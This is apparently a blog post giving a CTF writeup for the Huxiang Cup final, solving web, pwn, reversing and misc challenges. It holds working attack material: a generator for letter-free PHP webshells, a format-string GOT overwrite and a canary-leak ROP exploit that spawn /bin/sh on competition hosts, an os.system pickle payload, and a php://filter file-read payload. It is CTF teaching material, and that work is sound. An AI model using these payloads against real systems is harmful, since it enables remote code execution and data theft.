One Article a Day (8)

I have heard that many of the greats started their journey by writing their own blog.

I opened a blog a long time ago but never kept it up; time to build the habit, and learn to write and to share.

I will try to post one article a day; other study notes will follow as my learning progresses.

Still a bit tired today and did not learn much new, so here is a quick share of yesterday's 湖湘杯 (Huxiang Cup) writeup.

A brief verdict on this 湖湘杯: somewhat frustrating. Never mind the 60 seconds per multiple-choice question in the qualifiers;

the final ended at 10 pm and the writeup was due within 4 hours, so the scheduling did not feel very friendly.

Also, the final consisted mostly of recycled problems (originals from other CTFs), so it was comparatively easy, although a few of the problems are genuine classics.

1. Web300

Approach: code review shows that the uploaded payload may not contain any letters or digits. Following https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html, a payload can be built from non-alphanumeric characters alone: `''.[]` evaluates to the string "Array", indexing it with `'_'=='__'` (false, i.e. index 0) yields the letter 'A', and PHP's string increment (`$__++`) walks 'A' forward through the alphabet, so any uppercase word can be spelled and then used as a function name (function names are case-insensitive, so ASSERT calls assert). Note that the bare `_` inside `$_[_]` is an undefined constant, which PHP 5/7 treats as the string '_' with a notice; PHP 8 throws an Error for undefined constants, so this exact trick is version-dependent.

Here we build `assert($_GET[_]);`: `$___` accumulates ASSERT (the 'A' itself, then 18 increments to S twice, 4 to E, 17 to R and 19 to T), `$____` starts as '_' and accumulates GET (6, 4 and 19 increments), `$$____` then dereferences to `$_GET`, and `$___($_[_])` calls assert on the `_` parameter.

Upload the constructed payload (it contains no comments because any letter would break the filter):

$_=[];
$_=''.[];
$_=$_['_'=='__'];
$___=$_;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$____.=$__;

$_=$$____;
$___($_[_]);

Afterwards request `?_=system('cat ../flag.php');`. The output is raw PHP, which the browser hides as a tag, so view the page source to read the flag.
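Counting `$__++` by hand for every letter is error-prone, so here is a generator for the same construction, added as an example and not part of the original writeup. It spells arbitrary uppercase words (plus leading underscores) with the same three primitives ('A' from "Array", string increment, concatenation), emits the `assert($_GET[_])` shell shown above by default, and includes a replay routine that re-executes only the increment/concat statements to confirm what a generated payload spells. The `webshell()` parameters are this example's own names.

```python
import re
import string

# Leaves 'A' in $_ : ''.[] is the string "Array" and [false] is index 0.
PRELUDE = "$_=[];$_=''.[];$_=$_['_'=='__'];"


def spell(word, dest):
    """Emit PHP that builds `word` in variable `dest` using only $_ ('A') and string increment.
    Leading underscores are written as a quoted literal; every other character must be A-Z."""
    lead = len(word) - len(word.lstrip("_"))
    out = [f"{dest}='{'_' * lead}';"]
    for ch in word[lead:]:
        if ch not in string.ascii_uppercase:
            raise ValueError(f"cannot spell {ch!r} with 'A' and ++")
        out.append("$__=$_;" + "$__++;" * (ord(ch) - ord("A")) + f"{dest}.=$__;")
    return "".join(out)


def webshell(func="assert", source="_GET", key="_"):
    """func($source[key]) with no letters or digits: $___ spells the function (PHP function
    names are case-insensitive), $____ spells the superglobal's name, $$____ dereferences it.
    `key` must itself be letter- and digit-free; the bare _ is read as a constant (PHP 5/7)."""
    return (PRELUDE + spell(func.upper(), "$___") + spell(source, "$____")
            + f"$_=$$____;$___($_[{key}]);")


def is_alnum_free(payload):
    """The filter the challenge enforces: no ASCII letters or digits anywhere."""
    return re.search(r"[A-Za-z0-9]", payload) is None


def replay(payload):
    """Re-run only the assignment / ++ / concat statements starting from $_ == 'A' to confirm
    what the payload spells. A checker for this generator, not a PHP interpreter."""
    cur, words = "A", {}
    for stmt in payload.split(";"):
        stmt = stmt.strip()
        if stmt == "$__=$_":
            cur = "A"
        elif stmt == "$__++":
            cur = chr(ord(cur) + 1)          # 'A'..'Y' only; PHP's 'Z'++ would give 'AA'
        elif (m := re.fullmatch(r"(\$_+)\.=\$__", stmt)):
            words[m.group(1)] = words.get(m.group(1), "") + cur
        elif (m := re.fullmatch(r"(\$_+)='([^']*)'", stmt)):
            words[m.group(1)] = m.group(2)
    return words


if __name__ == "__main__":
    shell = webshell()
    print(shell)
    print(is_alnum_free(shell), replay(shell))
```

`replay(webshell())` reports `{'$___': 'ASSERT', '$____': '_GET'}`, and the increment count (105 in total: 76 for ASSERT, 29 for GET) matches the hand-built payload above.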

 

 

2. Encryptor.apk

Decompile the apk with apktool; in fact going straight to Java (dex2jar/jadx) is enough to read the code.

The logic: take the entered password (default Password), MD5 it, read the file, and call encryptbyte, which XORs the file byte by byte with the MD5 of the password. XOR is its own inverse, so the decryptor is the same operation:

exp.py

import hashlib

# The digest the original script hard-coded, dc647eb65e6711e155375218212b3964, is MD5("Password").
key = hashlib.md5(b"Password").digest()

with open('flag.encrypted', 'rb') as f:
    fcon = f.read()

def xor(text, key):
    # XOR each ciphertext byte with the digest byte at the same position, cycling through
    # the 16 digest bytes. The original script XORed each byte with the whole digest as one
    # integer, which chr() cannot take; cycling through the digest bytes is the assumed layout
    # and has to match what encryptbyte in the apk actually does.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(text))

with open('flag.decrypt', 'wb') as fo:
    fo.write(xor(fcon, key))

Finally the flag: flag{all_encryption_is_equal_but_some_are_More_equal_than_others}

 

3. 熱身運動 (warm-up)

This problem resembles one on 實驗吧: the position of each frame encodes a character. Reading the grid cell of each frame as an index into the base64 alphabet (columns A..H, rows 1..8, index = 8*(8-row) + column with A = 0, so B5 is 25 and F8 is 5) gives

B5 G4 B2 B4 B5 H2 E3 B2 F5 F8 E1 B2 F7 F6 F1 G4 F5 G6 B1 G3 G5 H6 E2

25 38 49 33 25 55 44 49 29 5 60 49 13 21 61 38 29 22 57 46 30 23 52

ZmxhZ3sxdF8xNV9mdW5ueX0

With the padding restored (ZmxhZ3sxdF8xNV9mdW5ueX0=) this base64-decodes to the flag 'flag{1t_15_funny}'.
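The cell-to-index mapping above, carried through to the flag, as an added example (not part of the original writeup). The formula `8*(8-row) + column` is inferred from the pairs the writeup lists (B5 -> 25, G4 -> 38, F8 -> 5, E1 -> 60); the padding step shows why the raw 23 characters need one '=' before decoding.

```python
import base64

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def cell_index(cell):
    """'B5' -> 25. Columns A..H are 0..7 left to right, rows 1..8 run from the top,
    eight cells per row, counted from the bottom row upwards: 8*(8-row) + column."""
    col = ord(cell[0].upper()) - ord("A")
    row = int(cell[1:])
    if not (0 <= col <= 7 and 1 <= row <= 8):
        raise ValueError(f"not a cell on the 8x8 grid: {cell!r}")
    return 8 * (8 - row) + col


def cells_to_base64(cells):
    """Map every whitespace-separated cell to its base64 character."""
    return "".join(B64_ALPHABET[cell_index(c)] for c in cells.split())


def decode_unpadded(b64):
    """Frames give no padding, so restore it: the length must be a multiple of 4."""
    return base64.b64decode(b64 + "=" * (-len(b64) % 4))


def solve(cells):
    return decode_unpadded(cells_to_base64(cells))


if __name__ == "__main__":
    frames = "B5 G4 B2 B4 B5 H2 E3 B2 F5 F8 E1 B2 F7 F6 F1 G4 F5 G6 B1 G3 G5 H6 E2"
    print(cells_to_base64(frames), solve(frames))
```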

4. Misc 300

This looks like a recycled problem from Pragyan CTF 2016: no description at all, just a file named pixels.jpg.pkl. The original was called who-made-me.

So run the script. The pickle holds a header element followed by the (x, y) coordinates of the white pixels. One caveat: unpickling executes whatever the file tells it to, so for an untrusted .pkl inspect it with pickletools.dis before calling pickle.load.

import pickle
from PIL import Image

with open('pixels.jpg.pkl', 'rb') as f:
    data = pickle.load(f)

# the first element is a header; the rest are (x, y) pairs of white pixels
white_pixels = [(int(e[0]), int(e[1])) for e in data[1:]]
width = max(p[0] for p in white_pixels) + 10
height = max(p[1] for p in white_pixels) + 10

image = Image.new('1', (width, height), 0)   # 1-bit image on a black background
pixels = image.load()
for x, y in white_pixels:
    pixels[x, y] = 255
image.show()

Out comes a picture of the cartoon 'Calvin and Hobbes', whose author is 'Bill Watterson'. Flag: billwatterson
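Loading a stranger's pickle with pickle.load is how a CTF download turns into code execution on the solver's machine, so here is the safe way to do the step above, as an added example (not part of the original writeup): a static scan for the opcodes that import something, and a restricted Unpickler that refuses every global lookup, which is enough for a list of tuples and integers. BENIGN is a constructed stand-in for pixels.jpg.pkl with the same layout (header, then pairs); MALICIOUS is a constructed pickle carrying an os.system reduce.

```python
import io
import os
import pickle
import pickletools


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global lookup: lists, tuples, ints and strings never need one,
    so the pixel data loads while os.system and friends stay unreachable."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing to import {module}.{name} from pickle")


def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


_STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "UNICODE",
               "STRING", "SHORT_BINSTRING", "BINSTRING"}


def pickled_globals(data):
    """Static look before loading: the (module, name) pairs that GLOBAL / STACK_GLOBAL
    opcodes would import. STACK_GLOBAL takes its operands from the two preceding strings."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in _STRING_OPS:
            strings.append(arg)
        if op.name == "GLOBAL":                 # protocol <= 3: "module name" in one argument
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":         # protocol 4+: module and name pushed as strings
            found.append((strings[-2], strings[-1]))
    return found


class _Shell:
    """Constructed sample of what a malicious .pkl carries: a reduce tuple calling os.system."""

    def __reduce__(self):
        return (os.system, ("echo pwned",))


BENIGN = pickle.dumps(["who-made-me", (10, 20), (11, 20), (12, 21)])  # constructed stand-in
MALICIOUS = pickle.dumps(_Shell())                                      # constructed


def is_rejected(data):
    """True if the restricted loader refuses the pickle instead of running it."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def white_pixels_from(data):
    """Same layout as the writeup's file: first element is a header, the rest are (x, y) pairs."""
    items = safe_loads(data)
    return [(int(e[0]), int(e[1])) for e in items[1:]]


if __name__ == "__main__":
    print("benign imports:", pickled_globals(BENIGN), "->", white_pixels_from(BENIGN))
    print("malicious imports:", pickled_globals(MALICIOUS), "rejected:", is_rejected(MALICIOUS))
```

`pickletools.dis(MALICIOUS)` shows the same STACK_GLOBAL line in human-readable form; the scan only tells you what a pickle would import, while the restricted loader is what actually stops it.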

5. pwne

This one is obviously a format string vulnerability. The exploitable calls:

read(0, &buf, 64u);
printf(&buf);

The uncontrolled printf leaks a stack address and a libc address (the return address into __libc_start_main sits at format argument 35), which gives the libc base. A second pass through the same printf then uses two %hn writes to overwrite atoi's GOT entry with the address of system; the program calls atoi on the AGE input, so once the GOT entry is redirected, sending /bin/sh as the age runs system("/bin/sh").

Key part of the exploit (the sd/cv helpers and the connection setup are the same as in the pwns script below):

from pwn import *

p = process("./pwne")            # or remote(host, port) against the live target

def sd(cont):
    p.sendline(cont)

def cv(cont):
    return p.recvuntil(cont)

# offsets are taken from the target's libc instead of being hard-coded
libc = ELF("./libc.so.6")
offset___libc_start_main_ret = libc.libc_start_main_return
offset_system = libc.symbols["system"]
atoi_got = 0x804A02C

# round 1: leak a stack address and the return address into __libc_start_main (argument 35)
cv(b"[Y/N]")
sd(b"Y")
cv(b"NAME:")
sd(b"%p===%p+++%35$p---")
cv(b"WELCOME")
leakstack = int(cv(b"===").split()[-1][:-3], 16)
cv(b"+++")
leaklibc = int(cv(b"---").split()[-1][:-3], 16)
base = leaklibc - offset___libc_start_main_ret
system = base + offset_system
system_h = (system & 0xffff0000) >> 16
system_l = system & 0x0000ffff
# %hn stores the running character count, which only grows: the low half is written first,
# so this payload layout needs the low half to be the smaller value
assert system_h >= system_l

# round 2: the AGE input stays a valid number ("90") and parks atoi@got and atoi@got+2
# where printf sees them as arguments 16 and 17
cv(b"AGE:")
padding = b"\x00" * 32
pay = b"90\x00\x00" + padding + p32(atoi_got) + p32(atoi_got + 2)
sd(pay)
cv(b"[Y/N]")
sd(b"Y")
cv(b"NAME")
payload = "%{systeml}c%16$hn%{systemh}c%17$hn".format(systeml=system_l, systemh=system_h - system_l)
sd(payload.encode())

# atoi@got now points at system, so the next "age" is executed as a shell command
cv(b"AGE")
sd(b"/bin/sh\x00")
# cat flag -> 52c12be949d88c14ccbe29d8733434c9
p.interactive()
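The %hn arithmetic the payload above depends on, as an added example (not part of the original exploit): a builder that splits a 32-bit value into two 16-bit writes, orders them so the running character count only ever increases (which removes the "low half must be smaller" restriction), and a minimal model of printf's %c / %hn handling used to check the result on a fake stack. The GOT address is the writeup's; the system address is a constructed value.

```python
import re


def hn_write_payload(addr, value, first_arg, already_printed=0):
    """Write the 32-bit `value` at `addr` with two %hn writes.

    Returns (pointers, fmt): place the pointers on the stack so that printf sees them as
    arguments first_arg and first_arg+1 (in that order) and send fmt through printf.
    %hn stores the number of characters printed so far (mod 2**16) and that count only grows,
    so the smaller half-word is written first and the second write pads by the difference.
    `already_printed` accounts for bytes printf output before the first directive."""
    halves = [(addr, value & 0xffff), (addr + 2, (value >> 16) & 0xffff)]
    halves.sort(key=lambda h: h[1])
    pointers, fmt, printed = [], "", already_printed
    for k, (where, want) in enumerate(halves):
        pad = (want - printed) % 0x10000
        if pad:
            fmt += f"%{pad}c"          # a width of pad prints exactly pad characters
            printed += pad
        fmt += f"%{first_arg + k}$hn"
        pointers.append(where)
    return pointers, fmt


def simulate_printf(fmt, stack_args, memory, already_printed=0):
    """Toy model of the two directives the payload uses: %<width>c prints max(width, 1)
    characters; %<k>$hn stores the low 16 bits of the count at the address held in the
    k-th argument (stack_args[k-1]). Returns the final character count."""
    printed = already_printed
    for m in re.finditer(r"%(\d*)c|%(\d+)\$hn", fmt):
        if m.group(0).endswith("c"):
            printed += max(int(m.group(1) or "1"), 1)
        else:
            memory[stack_args[int(m.group(2)) - 1]] = printed & 0xffff
    return printed


def read32(memory, addr):
    """Reassemble a dword from the two 16-bit cells the writes produced."""
    return memory.get(addr, 0) | (memory.get(addr + 2, 0) << 16)


def overwrite_got(system_addr=0xf7e40310, atoi_got=0x804A02C):
    """Same layout as the writeup: pointers at arguments 16 and 17, payload must fit the
    64-byte read. Returns the dword that ends up in atoi@got."""
    pointers, fmt = hn_write_payload(atoi_got, system_addr, 16)
    if len(fmt) >= 64:
        raise ValueError("format string does not fit in read(0, &buf, 64)")
    stack = [0] * 15 + pointers            # arguments 1..15 are whatever precedes the buffer
    memory = {}
    simulate_printf(fmt, stack, memory)
    return read32(memory, atoi_got)


if __name__ == "__main__":
    print(hn_write_payload(0x804A02C, 0xf7e40310, 16))
    print(hex(overwrite_got()), hex(overwrite_got(0xf7e4fff0)))
```

For 0xf7e40310 the builder emits `%784c%16$hn%62676c%17$hn`, the same shape as the exploit's payload; for a value whose low half is larger than its high half (0xf7e4fff0) it swaps the pointer order instead of failing.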

6. pwns

A quick look at the binary gives the plan: leak the stack canary first, then leak libc. The input is base64-decoded into a stack buffer and echoed back. Writing one byte past the buffer overwrites the canary's low NUL byte, so the echo runs on and prints the remaining three canary bytes; a longer write leaks a return address into __libc_start_main, from which the libc base, system and the "/bin/sh" string are computed. The final payload restores the canary and returns into system("/bin/sh").

#coding = utf-8
#code for pwns
from pwn import *
from base64 import b64encode

context.log_level = "debug"
local = False
name = "pwns"

if local:
    p = process(name)
else:
    p = remote("114.215.128.141", 10080)

def sd(cont):
    p.sendline(cont)

def cv(cont):
    return p.recvuntil(cont)

# libc offsets: return address into __libc_start_main, system, "/bin/sh"
if local:
    offset___libc_start_main_ret = 0x18637
    offset_system = 0x0003ada0
    offset_dup2 = 0x000d6300
    offset_read = 0x000d5af0
    offset_write = 0x000d5b60
    offset_str_bin_sh = 0x15b9ab
else:
    offset___libc_start_main_ret = 0x19af3
    offset_system = 0x00040310
    offset_read = 0x000dd3c0
    offset_write = 0x000dd440
    offset_str_bin_sh = 0x162cec

def senddata(payload, ath=False, final=False):
    """Send one base64-encoded record; return the echoed bytes unless this is the final payload."""
    cv(b"[Y/N]")
    sd(b"Y")
    cv(b"datas:\n\n")
    if ath:
        gdb.attach(p)
    p.send(b64encode(payload))
    if not final:
        cv(b"Result is:")
        return p.recvuntil(b"May beI", drop=True)

def getcanary():
    slen = 0x10d - 0xc                        # bytes from the buffer start to the canary
    data = senddata(b"a" * slen + b"a")       # the extra byte clobbers the canary's low NUL
    return data[258:261]                      # the three non-NUL canary bytes that follow

def getlibc():
    slen = 0x10d - 0xc + 0x50
    data = senddata(b"a" * slen)
    return data[0x151:0x151 + 4]              # return address into __libc_start_main

canary = u32(b"\x00" + getcanary())
print("canary:", hex(canary))
leak = u32(getlibc())
print("leak:", hex(leak))
libc_base = leak - offset___libc_start_main_ret
system_addr = libc_base + offset_system
binsh_addr = libc_base + offset_str_bin_sh
# buffer | canary | three saved registers | return to system | fake return address | "/bin/sh"
payload = b"a" * 0x101 + p32(canary) + p32(0xdeadbeef) * 3 + p32(system_addr) + p32(0xdeadbeef) + p32(binsh_addr)
senddata(payload, final=True)
p.interactive()
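Why the single extra byte matters, as an added example (not part of the original exploit): a model of the vulnerable frame with the writeup's layout (0x101 bytes of buffer, the canary with its NUL low byte, three saved registers, then the return address), an echo that stops at the first NUL the way strlen-based output does, the canary and return-address leaks, and the epilogue check the final payload has to pass. The canary and libc addresses are constructed values.

```python
import struct

# Constructed stack frame following the writeup's offsets.
BUF_LEN = 0x101
CANARY = 0x7a3c1e00              # low byte is 0 on x86 Linux, so strlen-style output stops at it
SAVED_REGS = b"\x11\x22\x33\x44" * 3
RET_ADDR = 0xf7e19af3            # constructed return address into __libc_start_main
FILLER = 0xdeadbeef


def fresh_frame():
    return bytearray(b"\x00" * BUF_LEN + struct.pack("<I", CANARY)
                     + SAVED_REGS + struct.pack("<I", RET_ADDR))


def vulnerable_echo(frame, data):
    """Model of the target: copy the decoded input with no bounds check, then echo it back
    up to the first NUL byte."""
    frame[:len(data)] = data
    end = frame.find(b"\x00")
    return bytes(frame if end < 0 else frame[:end])


def leak_canary():
    """BUF_LEN bytes stop at the canary's NUL; BUF_LEN + 1 overwrite it, so the echo spills
    the other three canary bytes. Same slice as data[258:261] in the exploit."""
    echoed = vulnerable_echo(fresh_frame(), b"a" * (BUF_LEN + 1))
    three = echoed[BUF_LEN + 1:BUF_LEN + 4]
    return struct.unpack("<I", b"\x00" + three)[0]


def leak_return_address():
    """The same overflow exposes everything up to and including the return address."""
    echoed = vulnerable_echo(fresh_frame(), b"a" * (BUF_LEN + 1))
    start = BUF_LEN + 4 + len(SAVED_REGS)
    return struct.unpack("<I", echoed[start:start + 4])[0]


def rop_payload(canary, system_addr, binsh_addr):
    """Layout from the exploit: buffer, canary, three saved registers, system,
    fake return address, pointer to "/bin/sh"."""
    return (b"a" * BUF_LEN + struct.pack("<I", canary) + struct.pack("<I", FILLER) * 3
            + struct.pack("<I", system_addr) + struct.pack("<I", FILLER)
            + struct.pack("<I", binsh_addr))


def function_return(frame):
    """Model of the epilogue: the canary check, then the return address that will be used."""
    if struct.unpack("<I", frame[BUF_LEN:BUF_LEN + 4])[0] != CANARY:
        raise RuntimeError("*** stack smashing detected ***")
    start = BUF_LEN + 4 + len(SAVED_REGS)
    return struct.unpack("<I", frame[start:start + 4])[0]


def exploit_succeeds(canary_guess, system_addr, binsh_addr):
    """True if the frame returns into system_addr with that canary; False if the check fires."""
    frame = fresh_frame()
    vulnerable_echo(frame, rop_payload(canary_guess, system_addr, binsh_addr))
    try:
        return function_return(frame) == system_addr
    except RuntimeError:
        return False


if __name__ == "__main__":
    print(hex(leak_canary()), hex(leak_return_address()))
    print(exploit_succeeds(leak_canary(), 0xf7e3e310, 0xf7f5ecec), exploit_succeeds(0, 0xf7e3e310, 0xf7f5ecec))
```

Sending exactly BUF_LEN bytes would leak nothing, because the echo stops at the canary's NUL; that is the whole reason for the `+ 'a'` in the exploit's getcanary().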

 

7. pyc analysis

First, a search for an online pyc decompiler (站長工具) and decompiling gives the following. The decompiler rendered every loop as nested lambdas, so the output is for reading, not running:

#!/usr/bin/env python

# encoding: utf-8

bbbb = (lambda __g, __y: continue[ [ [ [ [[ [ (fin.close(), [ [ ([], [])(((lambda __items, __after, __sentinel: (None,None, None, __y)((lambda __this: (lambda : (lambda __i: if __i is not__sentinel:

continue[ (ss.append(c), (sss.append(0),__this())[1])[1] for None in [

__i] ][0]None())(next(__items, __sentinel))

)

))()

), iter(s)), (lambda : continue[ [ (lambda__items, __after, __sentinel: (None, None, None, __y)((lambda __this: (lambda :(lambda __i: if __i is not __sentinel:

continue[ (lambda __value: continue[__this() for None in [

(lambda __ret: if __ret is NotImplemented:

__g['sssss'] +__value)(getattr(__g['sssss'], '__iadd__', (lambda other:NotImplemented))(__value))] ][0]

)(chr(c)) for None in [

                                __i] ][0]

                        return None()

)(next(__items, __sentinel))

)

))()

)((iter(ssss),), (lambda : continue[(fout.write(sssss), (fout.close(), None)[1])[1] for None in [

open('key.enc', 'wb+')] ][0]), []) for Nonein [

           ''] ][0] for None in [

           encode(ss, sss)] ][0]

), []) for None in [

       []] ][0] for None in [

       []] ][0])[1] for None in [

       fin.read().strip()] ][0] for None in [

       open('key.txt', 'r')] ][0] for None in [

       ((lambda data, buf: (lambda __l: continue[ [ ([], [])(((lambda __items,__after, __sentinel: (None, None, None, __y)((lambda __this: (lambda : (lambda__i: if __i is not __sentinel:

continue[ [ __this() for None in [

table.index(__l['data'][__l['i']]) + 1]][0] for None in [

__i] ][0]None())(next(__items, __sentinel))

)

))()

), iter(xrange(__l['_len']))), (lambda :(lambda __items, __after, __sentinel: (None, None, None, __y)((lambda __this:(lambda : (lambda __i: if __i is not __sentinel:

continue[ [ [ __this() for None in [

setbit(__l['buf'], __l['i'],getbit(__l['data'], __l['j']))] ][0] for None in [

(__l['i'] / 6) * 8 + __l['i'] % 6] ][0] forNone in [

__i] ][0]None())(next(__items, __sentinel))

)

))()

)((iter(xrange(__l['_len'] * 6)),), (lambda: __l['buf']), [])

), []) for None in [

                    len(__l['data'])] ][0] forNone in [

                   (data, buf)] ][0]

)({ })

), 'encode')] ][0] for None in [

       ((lambda p, pos: (lambda __l: continue[ [ [ __l['p'][__l['cpos']]>> __l['bpos'] & 1 for None in [

__l['pos'] % 8] ][0] for None in [

__l['pos'] / 8] ][0] for None in [

(p, pos)] ][0])({ })

), 'getbit')] ][0] for None in [

       ((lambda p, pos, value: (lambda __l: continue[ [ [ (lambda __target,__slice, __value: continue[ (lambda __target, __slice, __value: continue[__l['p'] for None in [

(lambda __old: (lambda __ret: if __ret isNotImplemented:

__old | __value)(getattr(__old, '__ior__',(lambda other: NotImplemented))(__value))

)(__target[__slice])] ][0]

)(__l['p'], __l['cpos'], __l['value']<< __l['bpos']) for None in [

                        (lambda __old: (lambda__ret: if __ret is NotImplemented:

__old & __value)(getattr(__old,'__iand__', (lambda other: NotImplemented))(__value))

)(__target[__slice])] ][0]

)(__l['p'], __l['cpos'], ~(1 <<__l['bpos'])) for None in [

                    __l['pos'] % 8] ][0] forNone in [

                    __l['pos'] / 8] ][0] for Nonein [

                    (p, pos, value)] ][0]

)({ })

), 'setbit')] ][0] for None in [

       string.printable.strip()] ][0] for None in [

       __import__('string', __g, __g)] ][0]

)(globals(), (lambda f: ((lambda x:x(x)),)((lambda y: (f,)((lambda : y(y)()))

))

))

That is the recovered Python source; it looks like the reverse problem from XDCTF2015.

Analysing the algorithm: each character of key.txt is replaced by its index in table plus one, then only the low 6 bits of every byte are bit-packed (LSB first) into key.enc. Undoing that gives exp.py.

Note that the global variables i and table defined in the original have to be added to the script, and what comes out is a key, not a flag... speechless, they promised flag format.

i = 654
table = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'

def tobin(b):
    # 8-bit MSB-first string of one byte
    return ''.join('1' if b & m else '0' for m in [128, 64, 32, 16, 8, 4, 2, 1])

def decode3b(s):
    # 3 packed bytes -> 4 six-bit values, undoing the encoder's LSB-first bit packing
    a = s >> 16
    b = (s >> 8) & 0xFF
    c = s & 0xFF
    sa, sb, sc = tobin(a), tobin(b), tobin(c)
    return (table[int(sa[2:], 2)] + table[int(sb[4:] + sa[:2], 2)]
            + table[int(sc[6:] + sb[:4], 2)] + table[int(sc[:6], 2)])

with open('key.enc', 'rb') as f:
    a = f.read()
s = ''
for pos in range(0, len(a), 3):
    s += decode3b(int.from_bytes(a[pos:pos + 3], 'big'))

print(s)

# undo the +1 the encoder added to every table index (modulo 64, since only 6 bits survived)
s = ''.join(table[(table.index(c) + 63) % 64] for c in s)
print(s)
#hhhhhqqqqKeyd9733c070b2138e5fsssfffffff"""""""""""""

Since only 6 bits per character survived the packing, indices wrap modulo 64: the 'd' (index 13) stands for ':' (index 77 = 13 + 64), so the key is 9733c070b2138e5f.

 

8. random

First the backup file .index.php.swp was found. Initially an .htaccess configuration problem seemingly made the backup unreadable; after it was adjusted the source could be viewed:

Index.php

<?php
error_reporting(0);
$flag = "*********************";
echo "please input a rand_num !";

function create_password($pw_length = 10)
{
    $randpwd = "";
    for ($i = 0; $i < $pw_length; $i++) {
        $randpwd .= chr(mt_rand(100, 200));
    }
    return $randpwd;
}

session_start();

mt_srand(time());

$pwd = create_password();

echo $pwd . '||';

if ($pwd == $_GET['pwd']) {
    echo "first";
    if ($_SESSION['userLogin'] == $_GET['login'])
        echo "Nice , you get the flag it is" . $flag;
} else {
    echo "Wrong!";
}

$_SESSION['userLogin'] = create_password(32) . rand();

?>

So the password is mt_rand output seeded with the server's time(), and it just takes brute-forcing pwd over a small window around the current time and submitting it. The login check is free: on a fresh session $_SESSION['userLogin'] is unset, so the loose comparison against an empty login parameter succeeds, and the session value is only assigned after the check.

Write a PHP script and run it locally. Two details worth keeping in mind: the password bytes lie in the range 100..200, so they have to be percent-encoded to survive the query string, and mt_rand's output changed in PHP 7.1, so the brute force has to run on the same PHP major version as the server.

Exp.php

<?php

function create_password($pw_length = 10)
{
    $randpwd = "";
    for ($i = 0; $i < $pw_length; $i++) {
        $randpwd .= chr(mt_rand(100, 200));
    }
    return $randpwd;
}

// try every seed within +-10 s of our own clock; the server seeds mt_rand with time()
for ($i = time() - 10; $i < time() + 10; $i++) {
    mt_srand($i);
    $pwd = create_password();
    // bytes >= 0x80 in the password must be percent-encoded to survive the query string
    $curl = file_get_contents("http://114.215.138.89:10080/index.php?pwd=" . rawurlencode($pwd) . "&login=");
    echo $curl . '<br>';
}

?>
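The same seed-recovery loop in Python, as an added example (not part of the original writeup), with one practical improvement: centre the window on the server's clock, read from the HTTP Date header, rather than on ours. Python's random.Random is used here as a stand-in for mt_srand/mt_rand; it is seeded and range-scaled differently from PHP, so the bytes differ from the real target while the weakness (a seed that is just the current second) is the same. The seeds and Date header below are constructed.

```python
import random
from email.utils import parsedate_to_datetime


def create_password(seed, length=10):
    """Stand-in for the page's create_password(): seed the generator, then one chr(rand(100, 200))
    per character. Not PHP's generator, so the bytes differ from the target; the structure is the same."""
    rng = random.Random(seed)
    return bytes(rng.randint(100, 200) for _ in range(length))


def recover_seed(observed, centre, window=10, length=10):
    """Brute-force the seed over [centre - window, centre + window], like the writeup's +-10 s loop.
    Returns the matching seed, or None if the server's clock is further away than the window."""
    for seed in range(centre - window, centre + window + 1):
        if create_password(seed, length) == observed:
            return seed
    return None


def server_epoch(date_header):
    """Centre the window on the server's own clock: the HTTP Date header as a Unix timestamp."""
    return int(parsedate_to_datetime(date_header).timestamp())


if __name__ == "__main__":
    observed = create_password(1510000000)                      # what the server echoed, constructed
    print(recover_seed(observed, server_epoch("Sun, 05 Nov 2017 20:26:46 GMT")))
```

Once the seed is known, create_password(seed, 32) also predicts the session value the server assigns afterwards, which is why the time-based seed breaks the second check as well as the first.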

9. web200

The problem was presumably meant to be about file upload. A directory scan found flag.php, but some unintended error made plain file inclusion work, so a PHP stream wrapper reads it out. Including flag.php directly would execute it and show nothing; the convert.base64-encode filter returns the source encoded instead (the script evidently appends .php, since resource=flag is enough).

Payload: ?op=php://filter/read=convert.base64-encode/resource=flag

Base64-decoding gives the source:

>>> import base64
>>> base64.b64decode('PD9waHAgCiRmbGFnPSJmbGFne2M0MjBmYjQwNTRIOTE5NDRhNzFmZjY4ZjcwNzliOTQyNGU1Y2JhMjF9IjsgCj8+Cg==')
b'<?php \n$flag="flag{c420fb4054H91944a71ff68f7079b9424e5cba21}"; \n?>\n'

10. Re4newer

A very easy problem with a big leap of imagination at the end.

Unpack with upx -d and open it in IDA; the logic is obvious: the input has to be 44 characters, each one is XORed with 0x22 and compared with a fixed string. exp.py:

text1 = [0x13, 0x4A, 0x76, 0x59, 0x45, 0x43, 0x4E, 0x44, 0x52, 0x4F, 0x4B, 0x51, 0x54, 0x7D, 0x63, 0x7D, 0x5F, 0x56, 0x13, 0x7D, 0x67, 0x67, 0x70, 0x70, 0x70, 0x7D, 0x47, 0x4E, 0x71, 0x4B, 0x7D, 0x51, 0x71, 0x51, 0x63, 0x52, 0x7D, 0x57, 0x7D, 0x67, 0x7D, 0x5B, 0x50, 0x11]

